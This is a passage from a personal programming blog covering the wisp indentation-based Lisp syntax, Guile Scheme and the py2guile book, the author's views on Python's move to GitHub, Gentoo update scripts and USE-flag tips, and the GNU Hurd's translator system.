    

     
  2. A line which is more indented than the previous line is a sibling to that line: It opens a new bracket.
    display                              ↦    (display
      string-append "Hello " "World!"    ↦      (string-append "Hello " "World!"))
    

     
  3. A line which is not more indented than previous line(s) closes the brackets of all previous lines which have higher or equal indentation. You should only reduce the indentation to indentation levels which were already used by parent lines, else the behaviour is undefined.
    display                              ↦    (display
      string-append "Hello " "World!"    ↦      (string-append "Hello " "World!"))
    display "Hello Again!"               ↦    (display "Hello Again!")
    

     
  4. To add any of ' , or ` to a bracket, just prefix the line with any combination of "' ", ", " or "` " (symbol followed by one space).
    ' "Hello World!"      ↦      '("Hello World!")
    

     
  5. A line whose first non-whitespace characters are a dot followed by a space (". ") does not open a new bracket: it is treated as simple continuation of the first less indented previous line. In the first line this means that this line does not start with a bracket and does not end with a bracket, just as if you had directly written it in lisp without the leading ". ".
    string-append "Hello"        ↦    (string-append "Hello"
      string-append " " "World"  ↦      (string-append " " "World")
      . "!""!")
    

     
  6. A line which contains only whitespace and a colon (":") defines an indentation level at the indentation of the colon. It opens a bracket which gets closed by the next less- or equal-indented line. If you need to use a colon by itself, you can escape it as "\:".
    let                       ↦    (let
      :                       ↦      ((msg "Hello World!"))
        msg "Hello World!"    ↦      (display msg))
      display msg             ↦      
    

     
  7. A colon surrounded by whitespace (" : ") in a non-empty line starts a bracket which gets closed at the end of the line.
    define : hello who                    ↦    (define (hello who)
      display                             ↦      (display 
        string-append "Hello " who "!"    ↦        (string-append "Hello " who "!")))
    

     
  8. You can replace any number of consecutive initial spaces by underscores, as long as at least one whitespace is left between the underscores and any following character. You can escape initial underscores by prefixing the first one with \ ("\___ a" → "(___ a)"), if you have to use them as function names.
    define : hello who                    ↦    (define (hello who)
    _ display                             ↦      (display 
    ___ string-append "Hello " who "!"    ↦        (string-append "Hello " who "!")))
    

     

To make that easier to understand, let’s just look at the examples in more detail:

3.1 A simple top-level function call

display "Hello World!"      ↦      (display "Hello World!")

This one is easy: Just add a bracket before and after the content.

3.2 Multiple function calls

display "Hello World!"      ↦      (display "Hello World!")
display "Hello Again!"      ↦      (display "Hello Again!")

Multiple lines with the same indentation are separate function calls (except if one of them starts with ". ", see Continue arguments, shown in a few lines).

3.3 Nested function calls

display                              ↦    (display
  string-append "Hello " "World!"    ↦      (string-append "Hello " "World!"))

If a line is more indented than a previous line, it is a sibling to the previous function: The brackets of the previous function gets closed after the (last) sibling line.

3.4 Continue function arguments

By using a . followed by a space as the first non-whitespace character on a line, you can mark it as continuation of the previous less-indented line. Then it is not a function call but continues the list of parameters of the function.

I use a very synthetic example here to avoid introducing additional unrelated concepts.

string-append "Hello"        ↦    (string-append "Hello"
  string-append " " "World"  ↦      (string-append " " "World")
  . "!""!")

As you can see, the final "!" is not treated as a function call but as parameter to the first string-append.

This syntax extends the notion of the dot as identity function. In many lisp implementations we already have `(= a (. a))`.

= a        ↦    (= a
  . a      ↦      (. a))

With wisp, we extend that equality to `(= '(a b c) '((. a b c)))`.

. a b c    ↦    a b c

3.5 Double brackets (let-notation)

If you use `let`, you often need double brackets. Since using pure indentation in empty lines would be really error-prone, we need a way to mark a line as indentation level.

To add multiple brackets, we use a colon to mark an intermediate line as additional indentation level.

let                       ↦    (let
  :                       ↦      ((msg "Hello World!"))
    msg "Hello World!"    ↦      (display msg))
  display msg             ↦      

3.6 One-line function calls inline

Since we already use the colon as syntax element, we can make it possible to use it everywhere to open a bracket - even within a line containing other code. Since wide unicode characters would make it hard to find the indentation of that colon, such an inline-function call always ends at the end of the line. Practically that means that the opened bracket of an inline colon always gets closed at the end of the line.

define : hello who                            ↦    (define (hello who)
  display : string-append "Hello " who "!"    ↦      (display (string-append "Hello " who "!")))

This also allows using inline-let:

let                       ↦    (let
  : msg "Hello World!"    ↦      ((msg "Hello World!"))
  display msg             ↦      (display msg))

and can be stacked for more compact code:

let : : msg "Hello World!"     ↦    (let ((msg "Hello World!"))
  display msg                  ↦      (display msg))

3.7 Visible indentation

To make the indentation visible in non-whitespace-preserving environments like badly written html, you can replace any number of consecutive initial spaces by underscores, as long as at least one whitespace is left between the underscores and any following character. You can escape initial underscores by prefixing the first one with \ ("\___ a" → "(___ a)"), if you have to use them as function names.

define : hello who                    ↦    (define (hello who)
_ display                             ↦      (display 
___ string-append "Hello " who "!"    ↦        (string-append "Hello " who "!")))

4 Syntax justification

I do not like adding any unnecessary syntax element to lisp. So I want to show explicitly why the syntax elements are required to meet the goal of wisp: indentation-based lisp with a simple preprocessor.

4.1 . (the dot)

We have to be able to continue the arguments of a function after a call to a function, and we must be able to split the arguments over multiple lines. That’s what the leading dot allows. Also the dot at the beginning of the line as marker of the continuation of a variable list is a generalization of using the dot as identity function - which is an implementation detail in many lisps.

`(. a)` is just `a`.

So for the single variable case, this would not even need additional parsing: wisp could just parse ". a" to "(. a)" and produce the correct result in most lisps. But forcing programmers to always use separate lines for each parameter would be very inconvenient, so the definition of the dot at the beginning of the line is extended to mean “take every element in this line as parameter to the parent function”.

Essentially this dot-rule means that we mark variables at the beginning of lines instead of marking function calls, since in Lisp variables at the beginning of a line are much rarer than in other programming languages. In Lisp, assigning a value to a variable is a function call while it is a syntax element in many other languages. What would be a variable at the beginning of a line in other languages is a function call in Lisp.

(Optimize for the common case, not for the rare case)

4.2 : (the colon)

For double brackets and for some other cases we must have a way to mark indentation levels without any code. I chose the colon, because it is the most common non-alpha-numeric character in normal prose which is not already reserved as syntax by lisp when it is surrounded by whitespace, and because it already gets used for marking keyword arguments to functions in Emacs Lisp, so it does not add completely alien characters.

The function call via inline " : " is a limited generalization of using the colon to mark an indentation level: If we add a syntax-element, we should use it as widely as possible to justify the added syntax overhead.

But if you need to use : as variable or function name, you can still do that by escaping it with a backslash (example: "\:"), so this does not forbid using the character.

4.3 _ (the underscore)

In Python the whitespace hostile html already presents problems with sharing code - for example in email list archives and forums. But in Python the indentation can mostly be inferred by looking at the previous line: If that ends with a colon, the next line must be more indented (there is nothing to clearly mark reduced indentation, though). In wisp we do not have this help, so we need a way to survive in that hostile environment.

The underscore is commonly used to denote a space in URLs, where spaces are inconvenient, but it is rarely used in lisp (where the dash ("-") is mostly used instead), so it seems like a natural choice.

You can still use underscores anywhere but at the beginning of the line. If you want to use it at the beginning of the line you can simply escape it by prefixing the first underscore with a backslash (example: "\___").

5 Background

A few months ago I found the readable Lisp project which aims at producing indentation based lisp, and I was thrilled. I had already done a small experiment with an indentation to lisp parser, but I was more than willing to throw out my crappy code for the well-integrated parser they had.

Fast forward half a year. It’s February 2013 and I started reading the readable list again after being out of touch for a few months because the birth of my daughter left little time for side-projects. And I was shocked to see that the readable folks had piled lots of additional syntax elements on their beautiful core model, which for me destroyed the simplicity and beauty of lisp. When language programmers add syntax using \\, $ and <>, you can be sure that it is no simple lisp anymore. To me readability does not just mean beautiful code, but rather easy to understand code with simple concepts which are used consistently. I prefer having some ugly corner cases to adding more syntax which makes the whole language more complex.

I told them about that and proposed a simpler structure which achieved almost the same as their complex structure. To my horror they proposed adding my proposal to readable, making it even more bloated (in my opinion). We discussed a long time - the current syntax for inline-colons is a direct result of that discussion in the readable list - then Alan wrote me a nice mail, explaining that readable will keep its direction. He finished with «We hope you continue to work with or on indentation-based syntaxes for Lisp, whether sweet-expressions, your current proposal, or some other future notation you can develop.»

It took me about a month to answer him, but the thought never left my mind (@Alan: See what you did? You anchored the thought of indentation based lisp even deeper in my mind. As if I did not already have too many side-projects… :)).

Then I had finished the first version of a simple whitespace-to-lisp preprocessor.

And today I added support for reading indentation based lisp from standard input which allows actually using it as in-process preprocessor without needing temporary files, so I think it is time for a real release outside my Mercurial repository.

So: Have fun with wisp v0.2 (tarball)!

PS: Wisp is linked in the comparisons of SRFI-110.

Attachments:
wisp-1.0.3.tar_.gz (756.71 KB)

Live stream from the Guile devroom at FOSDEM 2017!

Update: The recording is now online at ftp.fau.de/fosdem/2017/K.4.601/naturalscriptwritingguile.vp8.webm

Here’s the stream to the Guile devroom at #FOSDEM: https://live.fosdem.org/watch/k4601

Schedule (also on the FOSDEM page):

  • 09:45-10:30: Small languages panel (Christopher Webber, Ludovic Courtès, Etiene Dalcol, Justin Cormack)
  • 10:30-11:00: An introduction to functional package management with GNU Guix (Ricardo Wurmus)
  • 11:00-11:30: User interfaces with Guile and their application (John Darrington)
  • 11:30-12:00: Hacking with Guile… (Alex Sassmannshausen)
  • 12:00-12:45: Composing system services in GuixSD (Ludovic Courtès)
  • 12:45-13:15: Reproducible packaging and distribution of software with GNU Guix (Pjotr Prins)
  • 13:15-14:00: Network freedom, live at the REPL! (Christopher Webber)
  • 14:00-14:30: Natural script writing with Guile (Arne Babenhauserheide; sadly I had to cancel my attendance, Christopher Allan Webber will present the slides — thank you!)
  • 14:30-15:00: Mes -- Maxwell's Equations of Software (Jan Nieuwenhuizen (janneke))
  • 15:00-15:30: Adding GNU/Hurd support to GNU Guix and GuixSD (Manolis Ragkousis)
  • 15:30-16:00: Workflow management with GNU Guix (Roel Janssen)
  • 16:00-16:30: Getting started with guile-wiredtiger (Amirouche Boubekki (amz3))
  • 16:30-17:00: Future of Guix (Christopher Webber, Ludovic Courtès, Pjotr Prins, Ricardo Wurmus)

Every one of these talks sounds awesome! Here’s where we get deep.

Using Guile Scheme Wisp for low ceremony embedded languages

Update 2020: In Dryads Wake I am starting a game that uses the approach presented here to write dialogue-focused games with minimal ceremony. Demo: https://dryads-wake.1w6.org

Update 2018: Bitbucket is dead to me. You can find the source at https://hg.sr.ht/~arnebab/ews

Update 2017: A matured version of the work shown here was presented at FOSDEM 2017 as Natural script writing with Guile. There is also a video of the presentation (held by Chris Allan Webber; more info…). Happy Hacking!

Programming languages allow expressing ideas in non-ambiguous ways. Let’s do a play.

say Yes, I do!
Yes, I do!

This is a sketch of applying Wisp to a pet issue of mine: Writing the story of games with minimal syntax overhead, but still using a full-fledged programming language. My previous try was the TextRPG, using Python. It was fully usable. This experiment drafts a solution to show how much more is possible with Guile Scheme using Wisp syntax (also known as SRFI-119).

To follow the code here, you need Guile 2.0.11 on a GNU Linux system. Then you can install Wisp and start a REPL with

wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.8.6.tar.gz
tar xf wi*z; cd wi*/; ./c*e; make check; guile -L . --language=wisp

For finding minimal syntax, the first thing to do is to look at how such a structure would be written for humans. Let’s take the obvious and use Shakespeare: Macbeth, Act 1, Scene 1 (also it’s public domain, so we avoid all copyright issues). Note that in the original, the second and last non-empty line are shown as italic.

SCENE I. A desert place.

    Thunder and lightning. Enter three Witches

First Witch
    When shall we three meet again
    In thunder, lightning, or in rain?

Second Witch
    When the hurlyburly's done,
    When the battle's lost and won.

Third Witch
    That will be ere the set of sun.

First Witch
    Where the place?

Second Witch
    Upon the heath.

Third Witch
    There to meet with Macbeth.

First Witch
    I come, Graymalkin!

Second Witch
    Paddock calls.

Third Witch
    Anon.

ALL
    Fair is foul, and foul is fair:
    Hover through the fog and filthy air.

    Exeunt

Let’s analyze this: A scene header, a scene description with a list of people, then the simple format

person
    something said
    and something more

For this draft, it should suffice to reproduce this format with a full fledged programming language.

This is how our code should look:

First Witch
    When shall we three meet again
    In thunder, lightning, or in rain?

As a first step, let’s see how code which simply prints this would look in plain Wisp. The simplest way would just use a multiline string:

display "First Witch
    When shall we three meet again
    In thunder, lightning, or in rain?\n"

That works, but it’s not really nice. For one thing, the program does not have any of the semantic information a human would have, so if we wanted to show the First Witch in a different color than the Second Witch, we’d already be lost. Also throwing everything in a string might work, but when we need highlighting of certain parts, it gets ugly: We actually have to do string parsing by hand.

But this is Scheme, so there’s a better way. We can go as far as writing the sentences plainly, if we add a macro which grabs the variable names for us. We can do a simple form of this in just six short lines:

define-syntax-rule : First_Witch a ...
  format #t "~A\n" 
    string-join 
      map : lambda (x) (string-join (map symbol->string x))
            quote : a ...
      . "\n"

This already gives us the following syntax:

First_Witch
    When shall we three meet again
    In thunder, lightning, or in rain?

which prints

When shall we three meet again
In thunder, lightning, or in rain?

Note that :, . and , are only special when they are preceded by whitespace or are the first elements on a line, so we can freely use them here.

To polish the code, we could get rid of the underscore by treating everything on the first line as part of the character (indented lines are sublists of the main list, so a recursive syntax-case macro can distinguish them easily), and we could add highlighting with comma-prefixed parens (via standard Scheme preprocessing these get transformed into (unquote (...))). Finally we could add a macro for the scene, which creates these specialized parsers for all persons.

A completed parser could then read input files like the following:

SCENE I. A desert place.

    Thunder and lightning.

    Enter : First Witch
            Second Witch
            Third Witch

First Witch
    When shall ,(emphasized we three) meet again
    In thunder, lightning, or in rain?

Second Witch
    When the hurlyburly's done,
    When the battle's lost and won.

; ...

ALL
    Fair is foul, and foul is fair:
    Hover through the fog and filthy air.

action
    Exeunt

And with that the solution is sketched. I hope it was interesting for you to see how easy it is to create this!

Note also that this is not just a specialized text-parser. It provides access to all of Guile Scheme, so if you need interactivity or something like the branching story from TextRPG, scene writers can easily add it without requiring help from the core system. That’s part of the Freedom for Developers from the language implementors which is at the core of GNU Guile.

Don’t use this as a data interchange format for things downloaded from the web, though: It does give access to a full Turing complete language. That’s part of its power which allows you to realize a simple syntax without having to implement all kinds of specialized features which are needed for only one or two scenes. If you want to exchange the stories, better create a restricted interchange-format which can be exported from scenes written in the general format. Use lossy serialization to protect your users.

And that’s all I wanted to say ☺

Happy Hacking!

PS: For another use of Shakespeare in programming languages, see the Shakespeare programming language. Where this article uses Wisp as a very low ceremony language to represent very high level concepts, the Shakespeare programming language takes the opposite approach by providing an extremely high-ceremony language for very low-level concepts. Thanks to ZMeson for reminding me ☺

Attachments:
2015-09-12-Sa-Guile-scheme-wisp-for-low-ceremony-languages.org (6.35 KB)
enter-three-witches.w (1.23 KB)

Going from Python to Guile Scheme - a natural progression

py2guile book

Python is the first language I loved. I dreamt in Python, I planned in Python, I thought I would never need anything else.

 - Free: html | pdf
 - Softcover: 14.95 €
   with pdf, epub, mobi
 - Source: download
   free licensed under GPL

I will show you why I love Python

Python is a language where I can teach a handful of APIs and cause people to learn most of the language as a whole. — Raymond Hettinger (2011-06-20)

  • Pseudocode which runs
  • One way to do it
  • Hackable
  • Batteries and Bindings
  • Scales up

Where I hit its limits

Why, I feel all thin, sort of stretched if you know what I mean: like butter that has been scraped over too much bread. — Bilbo Baggins in “The Lord of the Rings”

  • Dual Syntax: What we teach new users is no longer what we use
  • Ceremony creeps in
  • Complexity is on the rise

And how I lost its shackles

You must unlearn what you have learned. — Yoda in “The Empire Strikes Back“

Guile Scheme is the official GNU extension language, used for example in GNU Cash and GNU Guix and the awesome Lilypond.

Accompany me on a path beyond Python

Every sufficiently complex application/language/tool will either have to use Lisp or reinvent it the hard way. — Greenspun's tenth rule

As free cultural work, py2guile is licensed under the GPLv3 or later. You are free to share, change, remix and even to resell it as long as you say that it’s from me (attribution) and provide the whole corresponding source under the GPL (sharealike).

For instructions on building the ebook yourself, see the README in the source.

Happy Hacking!

— Arne Babenhauserheide

Gratis py2guile from Freenet

py2guile book

py2guile is a book I wrote about Python and Guile Scheme. It’s selling at 14.95 € (https://www.epubli.de/shop/buch/47692) for the printed softcover.

To fight the new German data retention laws, you can get the ebook gratis: Just install Freenet, then the following links work:

Escape total surveillance and get an ebook about the official GNU extension language for free today!

Python chooses Github, therefore I’m releasing the py2guile PDF for free

py2guile book

Python is the first language I loved. I dreamt in Python, I planned in Python, I thought I would never need anything else.

  Download “Python to Guile” (pdf)

You can read more about this on the Mercurial mailing list.

 - Free: html | pdf
   preview edition
   (complete)

Yes, this means that with Guile I will contribute to a language developed via Git, but it won’t be using a proprietary platform.

If you like py2guile, please consider buying the book:

 - Softcover: 14.95 €
   with digital companion
 - Source: download
   free licensed under GPL

More information: draketo.de/py2guile

Commentary on Python and Github

Subjective popularity contest without robust data

I was curious why this happened so I read through PEP 0481. It's interesting that Git was chosen to replace Mercurial due to Git's greater popularity, yet a technical comparison was deemed as subjective. In fact, no actual comparison (of any kind) was discussed. What a shame. — Emmanuel Rosa on G+

yes. And the popularity contest wasn’t done in any robust way — they present values between 3x as popular and 18x as popular. That is a crazy margin of error — especially for a value on which to base a very disrupting decision. — my answer

No more dogfooding

Yesterday Python maintainers chose to move to GitHub and Git. Python is now developed using a C-based tool on a Ruby-based, unfree platform. And that changed my view on what’s happening in the community. Python no longer fosters its children and it even stopped dogfooding where its tools are as good as or better than other tools. I don’t think it will die. But I don’t bet on it for the future anymore. — EDIT to my answer on Quora “is Python a dying language?” which originally stated “it’s not dying, it’s maturing”.

Github invades your workflows

The PEP for github hedges somewhat by using github for code but not bug tracker. Not ideal considering BitKeeper, but a full on coup for GitHub. — Martin Owens

that’s something like basic self-defense, but my experience with projects who moved to GitHub is that GitHub soon starts to invade your workflows, changing your cooperation habits. At some point people realize that they can’t work well without GitHub anymore.

Not becoming dependent on GitHub while using it requires constant vigilance. Seeing how Python already switched to Git and GitHub because existing infrastructure wasn’t maintained does not sound like they will be able or willing to put in the work to keep independent. — my answer on G+

Foreboding since 2014

I was already pretty disappointed when I heard that Python is moving to Git. Seeing it choose the proprietary platform is an even sadder choice from my perspective. Two indicators for a breakage in the culture of the project.

For me that’s a reason to leave Python. Though it’s not like I did not get a foreboding of that. It’s why I started learning Guile Scheme in 2013 — and wrote about the experience.

I will still use Python for many practical tasks — it acquired the momentum for that, especially in science (I was a champion for Python in the institute, which is now replacing Matlab and IDL for many people here, and I will be teaching Python starting two weeks from now). I think it will stay strong for many years; a good language to start and a robust base for existing programs. But with what I learned the past years, Python is no longer where I place my bets. — slightly adjusted version of my post on the Mercurial mailing list.

Popularity without robust data instead of quality

(this is taken from a message I wrote to Brett, so I don’t have to say later that I stayed silent while Python went down. I got a nice answer, and despite the disagreement we said a friendly good bye)

Back when I saw that Python might move to git, I silently resigned and stopped caring to some degree. I have seen a few projects move to Git in the past years (and in every project problems remained even years after the switch), so when it came to cPython, the quarrel with git-fans just didn’t feel worthwhile anymore.

Seeing Python choose GitHub with the notion of “git is 3x to 18x more popular than Mercurial and free solutions aren’t better than GitHub” makes me lose my trust in the core development community, though.

PEP 481 states that it is about the quality of the tooling, but it names the popularity numbers quite prominently: python.org/dev/peps/pep-0481/

If they were not relevant, they should not have been included; but they are included, so they seem to be relevant to the decision. And “the best tooling” is mostly subjective, too — which shows in the PEP itself, which mostly talks about popularity, not quality. It even goes to great lengths describing how to avoid many of the features of GitHub.

I’ve seen quite a few projects try to avoid lock-in to GitHub. None succeeded. Not even in one where two of about six active developers were deeply annoyed by GitHub. This is exactly what the scipy part of the PEP describes: lock-in due to group effects.

Finally, using hg-git is far from seamless. I use it for several projects, and when the repositories become big (as cPython’s is), the overhead of the conversion becomes a major hassle. It works, but native Mercurial would be much more efficient. When pushing takes minutes, you start to think twice about whether you’ll just do the quick fix right now. Not to mention that at some point people start to demand signing of commits in git-style (not possible with hg-git, you can only sign commits mercurial-style) as well as other gitologisms (which have an analogue in Mercurial but aren’t converted by hg-git).

Despite my disappointment, I wish you all the best. Python is a really cool language. It’s the first one I loved and will always stay dear to me, so I’m happy that you work on it — and I hope you keep it up.

So, I think this is goodbye. A bit melancholic, but that’s how that goes.

Good luck to you in your endeavors,
Arne Babenhauserheide

Enough negativity

And that’s enough negativity from me.

Thank you, Brett, for reminding me that even though we might disagree, it’s important to remember that people in the project are hit by negativity much harder than it feels for the one who writes.

For my readers: If that also happened to you one time or the other, please read his article:

How I stay happy making open source software

Thank you, Brett. Despite everything I wrote here, I still think that Python is a great project, and it got many things right — some of which are things which are at least as important as code but much less visible, like having a large, friendly community.

I’m happy that Python exists, and I hope that it keeps going. And where I use programming to make a living, I’m glad when I can do it in Python. Despite all my criticism, I consider Python the best choice for many tasks, and this is also written in py2guile: almost the entire first half of the book talks about the strengths of Python. Essentially I could not criticize Python as strongly as I do here if I did not like it so much. Keep that in mind when you think about what you read.

Brett has now also published an article in which he details the decision to move to GitHub. It is a good read: The history behind the decision to move Python to GitHub — Or, why it took over a year for me to make a decision

For me, Gentoo is about *convenient* choice

It's often said that Gentoo is all about choice, but that doesn't quite capture what it is for me.

After all, the highest ability to choose is Linux From Scratch, and I can get any amount of choice in every distribution by just going deep enough (and investing enough time).

What really distinguishes Gentoo for me is that it makes it convenient to choose.

Since we all have a limited time budget, many of us only have real freedom to choose because we use Gentoo, which makes it possible to choose with the distribution's own tools. Therefore calling it just “choice” doesn't ring true in general - it misses the reason why we can choose.

So what Gentoo gives me is not just choice, but convenient choice.

Some examples to illustrate the point:

KDE 4 without qt3

I recently rebuilt my system after deciding to switch my disk layout (away from reiserfs towards a simple ext3 with reiser4 for the portage tree). When doing so I decided to try a "pure" KDE 4 - that is, a KDE 4 without any remnants of KDE 3 or qt3.

To use KDE without any qt3 applications, I just had to put "-qt3" and "-qt3support" into my USE flags in /etc/make.conf and run "emerge -uDN world" (and solve any arising conflicts).
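
As a minimal sketch, the relevant pieces would look like this (assuming an otherwise default make.conf):

# /etc/make.conf (nowadays usually /etc/portage/make.conf)
USE="-qt3 -qt3support"

# afterwards rebuild everything whose USE flags changed
emerge -uDN world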

Imagine doing the same with a (K)Ubuntu...

Emacs support

Similarly, to enable emacs support on my GentooXO (for all programs which can have emacs support), I just had to add the "emacs" USE flag and run "emerge -uDN world".

Selecting which licenses to use

Just add

ACCEPT_LICENSE="-* @FSF-APPROVED @FSF-APPROVED-OTHER"

to your /etc/make.conf to make sure you only get software under licenses which are approved by the FSF.

For only free licenses (regardless of the approved state) you can use:

ACCEPT_LICENSE="-* @FREE"

All others get marked as masked by license. The default (no ACCEPT_LICENSE in /etc/make.conf) is “* -@EULA”: everything except licenses which require explicitly accepting an EULA. You can check your setting via emerge --info | grep ACCEPT_LICENSE. More information…

One program (suite) in testing, but the main system rock stable

Another area where Gentoo makes choosing convenient is testing and unstable programs.

I remember my pain with a Kubuntu, where I wanted to use the most recent version of Amarok. I either had to add a dedicated Amarok-only testing repository (which I'd need for every single testing program), or I had to switch my whole system into testing. I did the latter and my graphical package manager ceased to work. Just imagine how quickly I ran back to Gentoo.

And then have a look at the ease of deciding to take one package into testing in Gentoo:

  • emerge --autounmask-write =category/package-version
  • etc-update
  • emerge =category/package-version

EDIT: Once I had a note here “It would be nice to be able to just add the missing dependencies with one call”. This is now possible with --autounmask-write.
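
For illustration, a hypothetical entry as --autounmask-write would write it (package name and version are just examples):

# /etc/portage/package.accept_keywords (package.keywords on older setups)
=media-sound/amarok-2.8.0 ~amd64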

And for some special parts (like KDE 4) I can easily say something like

  • ln -s /usr/portage/local/layman/kde-testing/Documentation/package.keywords/kde-4.3.keywords /etc/portage/package.keywords/kde-4.3.keywords

(I don't have the kde-testing overlay on my GentooXO, where I write this post, so the exact command might vary slightly)

Closing remarks

So to finish this post: For me, Gentoo is not only about choice. It is about convenient choice.

And that means: Gentoo gives everybody the power to choose.

I hope you enjoy it as much as I do!

Automatic updates in Gentoo GNU/Linux

Update 2016: I nowadays just use emerge --sync; emerge @security

To keep my Gentoo up to date, I use daily and weekly update scripts which also always run revdep-rebuild after the Saturday night update :)

My daily update is via pkgcore to pull in all important security updates:

pmerge @glsa

That pulls in the Gentoo Linux Security Advisories - important updates with mostly short compile time. (You need pkgcore for that: "emerge pkgcore")

Also I use two cron scripts.

Note: It might be useful to add the lafilefixer to these scripts (source).

The following is my daily update (in /etc/cron.daily/update_glsa_programs.cron )

Daily Cron

#! /bin/sh

### Update the portage tree and the glsa packages via pkgcore

# spew a status message
echo $(date) "start to update GLSA" >> /tmp/cron-update.log

# Sync only portage
pmaint sync /usr/portage

# security relevant programs
pmerge -uDN @glsa > /tmp/cron-update-pkgcore-last.log || cat \
    /tmp/cron-update-pkgcore-last.log >> /tmp/cron-update.log

# And keep everything working
revdep-rebuild

# Finally update all configs which can be updated automatically
cfg-update -au

echo $(date) "finished updating GLSA" >> /tmp/cron-update.log

And here's my weekly cron - executed every Saturday night (in /etc/cron.weekly/update_installed_programs.cron ):

Weekly Cron

#!/bin/sh

### Update my computer using pkgcore,
### since that also works if some dependencies couldn't be resolved.

# Sync all overlays
eix-sync

## First use pkgcore
# security relevant programs (with build-time dependencies (-B))
pmerge -BuD @glsa

# system, world and all the rest
pmerge -BuD @system
pmerge -BuD @world
pmerge -BuD @installed

# Then use portage for packages pkgcore misses (including overlays)
# and for *EMERGE_DEFAULT_OPTS="--keep-going"* in make.conf
emerge -uD @security
emerge -uD @system
emerge -uD @world
emerge -uD @installed

# And keep everything working
emerge @preserved-rebuild
revdep-rebuild

# Finally update all configs which can be updated automatically
cfg-update -au

pkgcore vs. eix → pix (find packages in Gentoo)

For a long time it bugged me that eix uses a separate database which I need to keep up to date. But no longer: with pkgcore as fast as it is today, I set up pquery to replace eix.

The result is pix:

alias pix='pquery --raw -nv --attr=keywords'

(put the above in your ~/.bashrc)

The output looks like this:

$ pix pkgcore
 * sys-apps/pkgcore
    versions: 0.5.11.6 0.5.11.7
    installed: 0.5.11.7
    repo: gentoo
    description: pkgcore package manager
    homepage: http://www.pkgcore.org
    keywords: ~alpha ~amd64 ~arm ~hppa ~ia64 ~ppc ~ppc64 ~s390 ~sh ~sparc ~x86

It’s still a bit slower than eix, but it operates directly on the portage tree and my overlays — and I no longer have to use eix-sync for syncing my overlays, just to make sure eix is updated.

Some other treats of pkgcore

Aside from pquery, pkgcore also offers pmerge to install packages (almost the same syntax as emerge) and pmaint for synchronizing and other maintenance stuff.

From my experience, pmerge is hellishly fast for simple installs like pmerge kde-misc/pyrad, but it sometimes breaks with world updates. In that case I just fall back on portage. Both are Python, so when you have one, adding the other is very cheap (spacewise).

Also pmerge has the nice pmerge @glsa feature: Get Gentoo Linux security updates. Due to its almost unreal speed (compared to portage), checking for security updates doesn’t hurt anymore.

$ time pmerge -p @glsa
 * Resolving...
Nothing to merge.

real    0m1.863s
user    0m1.463s
sys     0m0.100s

It differs from portage in that you call world explicitly as a set — either via a command like pmerge -aus world or via pmerge -au @world.

pmaint on the other hand is my new overlay and tree synchronizer. Just call pmaint sync to sync all, or pmaint sync /usr/portage to sync only the given overlay (in this case the portage tree).

Caveats

Using pix as replacement of eix isn’t yet perfect. You might hit some of the following:

  • pix always shows all packages in the tree and the overlays. The keywords are only valid for the highest version, though. marienz from #pkgcore on irc.freenode.net is working on fixing that.

  • If you only want to see the packages which you can install right away, just use pquery -nv. pix is intended to mimic eix as closely as possible, so I don’t have to change my habits ;) If it doesn’t fit your needs, just change the alias.

  • To search only in your installed packages, you can use pquery --vdb -nv.

  • Sometimes pquery might miss something in very broken overlay setups (like my organically grown one). In that case, please report the error in the bugtracker or at #pkgcore on irc.freenode.net:

    23:27 <marienz> if they're reported on irc they're probably either fixed pretty quickly or they're forgotten
    23:27 <marienz> if they're reported in the tracker they're harder to forget but it may take longer before they're noticed

I hope my text helps you in changing your Gentoo system further towards the system which fits you best!

No, it ain’t “forever” (GNU Hurd code_swarm from 1991 to 2010)

If the video doesn’t show, you can also download it as Ogg Theora & Vorbis “.ogv” or find it on youtube.

This video shows the activity of the Hurd coders and answers some common questions about the Hurd, including “How stagnated is Hurd compared to Duke Nukem Forever?”. It is created directly from commits to Hurd repositories, processed by community codeswarm.

Every shimmering dot is a change to a file. These dots align around the coder who did the change. The questions and answers are quotes from today’s IRC discussions (2010-07-13) in #hurd at irc.freenode.net.

You can clearly see the influx of developers in 2003/2004 and then again a strengthening of the development in 2008 with fewer participants but higher activity than 2003 (though a part of that change likely comes from the switch to git with generally more but smaller commits).

I hope you enjoyed this high-level look at the activity of the Hurd project!

PS: The last part is only the information title with music to honor Sean Wright for allowing everyone to use and adapt his Album Enchanted.

Some technical advantages of the Hurd

→ An answer to just accept it, truth hurds, where Flameeyes told his reasons for not liking the Hurd and asked for technical advantages (and claimed that the Hurd does not offer a concept which got incorporated into other free software, contributing to other projects). Note: These are the points I see. Very likely there are more technical advantages which I don’t see well enough to explain them.

The translator system in the Hurd is a simple concept that makes many tasks easy, which are complex with Linux (like init, network transparency, new filesystems, …). Additionally there are capabilities (give programs only the access they need - adjusted at runtime), subhurds and (academic) memory management.

Information for potential testers: The Hurd is already usable, but it is not yet in production state. It progressed a lot during the recent years, though. Have a look at the status report if you want to see if it’s already interesting for you. See running the Hurd for testing it yourself.


Influence on other systems: FUSE in Linux and limited translators in NetBSD

First off: FUSE is essentially an implementation of parts of the translator system (which is the main building block of the Hurd) for Linux, and NetBSD recently got a port of the translator system of the Hurd. That’s the main contribution to other projects that I see.

As an update in 2015: A pretty interesting development in the past few years is that the systemd developers have been bolting features onto Linux which the Hurd already provided 15 years ago. Examples: socket activation provides on-demand startup like passive translators, but as a crude hack piggybacked on dbus which can only be used by dbus-aware programs, while passive translators can be used by any program which can access the filesystem; calling privileged programs via systemd provides jailed privilege escalation like adding capabilities at runtime, but again as a crude hack piggybacked on dbus and specialized services.

That means there is a need for the features of the Hurd, but instead of just using the Hurd, where they are cleanly integrated, these features are bolted onto a system where they do not fit and suffer from bad performance due to requiring lots of unnecessary cruft to circumvent limitations of the base system. The clean solution would be to just set 2-3 full-time developers onto the task of resolving the last few blockers (mainly sound and USB) and then just use the Hurd.

translator-based filesystem

On the bare technical side, the translator-based filesystem stands out: The filesystem allows making arbitrary programs responsible for displaying a given node (which can also be a directory tree) and starting these programs on demand. To make them persistent over reboots, you only need to add them to the filesystem node (for which you need the right to change that node). Also you can start translators on any node without having to change the node itself, but then they are not persistent and only affect your view of the filesystem without affecting other users. These translators are called active, and you don’t need write permissions on a node to add them.
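
Roughly, on a Hurd system this could look like the following sketch (the node path and the classic hello translator are just an illustration):

# passive translator: recorded in the node, started on demand,
# survives reboots (you need the right to change the node)
touch ~/hello
settrans ~/hello /hurd/hello
cat ~/hello   # should print "Hello World!"

# active translator: started right now, only affects your own view
# of the filesystem and needs no write access to the node
settrans -a ~/hello /hurd/hello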

network transparency on the filesystem level

